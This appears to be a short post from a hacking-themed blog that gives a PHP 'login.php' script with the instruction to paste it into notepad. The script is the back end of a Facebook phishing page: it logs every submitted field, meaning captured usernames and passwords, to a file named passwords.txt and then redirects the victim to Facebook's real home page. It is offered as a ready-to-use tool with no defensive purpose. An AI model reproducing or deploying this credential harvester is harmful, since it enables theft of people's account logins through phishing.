Top Ad unit 728 × 90

login.php

 Just paste this on the notepad

<?php
header("Location: http://www.facebook.com/home.php? ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
login.php Reviewed by Unknown on May 29, 2017 Rating: 5

No comments:

Thanks for supporting me

All Rights Reserved by BlogBits © 2014 - 2015
Powered by Hacking tool

Contact Form

Name

Email *

Message *

Powered by Blogger.